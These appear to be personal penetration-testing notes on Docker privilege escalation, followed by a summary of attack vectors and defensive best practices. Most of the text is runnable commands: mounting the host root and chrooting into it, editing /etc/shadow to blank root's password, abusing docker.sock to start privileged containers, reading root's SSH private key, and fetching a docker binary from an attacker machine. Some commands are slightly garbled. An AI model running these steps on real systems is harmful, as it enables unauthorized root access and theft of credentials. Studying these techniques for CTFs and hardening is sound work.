docker

List docker instances

docker image list

If "alpine" is running

docker run -v /:/mnt --rm -it alpine chroot /mnt bash

								OR

docker run -v /:/mnt -it alpine
cd /mnt; vim etc/shadow                       #remove the root "x" and save it
exit                                          # exit docker
su -r root                                    # switch to root user in host os

---

User must be part of docker group

Docker architecture

• The docker daemon (server)

• The docker client

Enumerate

ls -la ~/

cat .ssh/id_rsa

Docker socket

It allows us and processes to communicate with each other within the docker daemon

Use docker to interact with socket

wget https://<parrot-os>:443/docker -O docker

chmod +x docker

ls -la

/tmp/docker -H unix:///app/docker.sock ps

Map directories

/tmp/docker -H unix:///app/docker.sock run --rm -d --privileged -v /:/hostsystem main_app

/tmp/docker -H unix:///app/docker.sock run --rm -d -privileged -v /:/hostsystem main_app

Navigate to system

/tmp/docker -H unix:///app/docker.sock exec -it 7ae3bcc818af /bin/bash

cat /hostsystem/root/.ssh/id_rsa

Check which images exists and we have access

docker image ls

Write docker socket to escalate privileges

ls

---

---

Docker Privilege Escalation Techniques

Check Docker Version

Determine the installed Docker version.

docker version

List Docker Images

View available Docker images.

docker image ls

List Docker Containers

Show all running and stopped Docker containers.

docker ps -a

Check User's Docker Group Membership

Check if the user is part of the docker group, which may allow privilege escalation.

id

Locate Docker Socket

Check the default location of the Docker socket.

ls -l /var/run/docker.sock

Download Docker Binary (If Not Available in Container)

Fetch the Docker binary in case it's missing.

wget <URL_TO_DOCKER_BINARY> -O docker
chmod +x docker

List Running Containers via Docker Socket

Use the Docker socket to list running containers.

./docker -H unix:///var/run/docker.sock ps

Run a Privileged Container with Host Root Mount

Start a privileged container and mount the host’s root filesystem.

./docker -H unix:///var/run/docker.sock run --rm -d --privileged -v /:/hostsystem <image_name>

Execute a Shell in the Privileged Container

Gain shell access inside the privileged container.

./docker -H unix:///var/run/docker.sock exec -it <container_id> /bin/bash

Access Host Files from Within the Container

View sensitive host files inside the container.

cat /hostsystem/root/.ssh/id_rsa

Run a Container with a Chroot into the Host

Use chroot to access the host system from inside a container.

docker -H unix:///var/run/docker.sock run -v /:/mnt --rm -it ubuntu chroot /mnt bash

Check If Docker Socket is Writable

Ensure that the Docker socket has the appropriate permissions.

ls -l /var/run/docker.sock

Using Docker Compose to List Running Containers

View running containers using Docker Compose.

docker-compose ps -a

Using Docker Compose to Execute a Shell in a Container

Access a shell within a running container using Docker Compose.

docker-compose exec <container_name> /bin/bash

Using Docker Compose to Check Service Configurations

Inspect service configurations in Docker Compose.

docker-compose config --services <service_name>

Key Concepts:

• Docker Architecture:

  • Docker Daemon (server): Manages containers, images, networks, and storage.

  • Docker Client: Interface for interacting with the Daemon.

  • Docker Compose: Orchestrates multi-container applications.

  • Docker Desktop: GUI for managing Docker.

• Docker Images and Containers:

  • Images: Read-only templates.

  • Containers: Mutable instances of images.

• Privilege Escalation Vectors:

  • Shared Directories (Volume Mounts): Accessing sensitive host files.

  • Docker Sockets: Abusing the Docker daemon socket for control.

  • Docker Group: Membership grants control over the Docker daemon.

  • Writable Docker Sockets: Abusing writable docker sockets when the user is not in the docker group.

Exploitation Techniques:

• Shared Directories:

  • Locating mounted host directories within the container.

  • Accessing sensitive files (e.g., SSH private keys).

• Docker Sockets:

  • Locating the docker.sock file.

  • Using the docker binary (or downloading it) to interact with the socket.

  • Running privileged containers with host root mounts.

  • Using docker run with a chroot into the host system.

• Docker Group:

  • Checking user group membership (id).

  • Exploiting the ability to run arbitrary Docker commands.

• Writable Docker Sockets:

  • Checking permissions on the docker.sock file.

  • Executing commands through the docker socket to gain root on the host.

Important Considerations and Enhancements:

• Security Best Practices:

  • Minimize volume mounts.

  • Use read-only mounts when possible.

  • Restrict access to the Docker socket.

  • Avoid running containers with --privileged.

  • Implement proper user and group management.

  • Use security scanning tools for docker images.

  • Use docker rootless mode.

• Attack Vectors:

  • Exploiting vulnerabilities in the Docker daemon itself.

  • Compromised Docker images.

  • Misconfigured Docker Compose files.

• Detection:

  • Monitor Docker socket activity.

  • Audit Docker configurations.

  • Use intrusion detection systems.

• Containerization Security:

  • Understanding Docker security is crucial for modern infrastructure.

  • Tools like Docker Bench for Security and Clair can help assess security.

• Namespaces and Cgroups: Reinforce the importance of namespaces and cgroups in docker security.

• Real World Examples: Researching real world docker escapes will help solidify understanding of the attack vectors.

• Rootless Docker: Modern docker installations can run in rootless mode, which greately reduces the attack surface.

• Docker Capabilities: Docker utilizes linux capabilities, and those can be missused.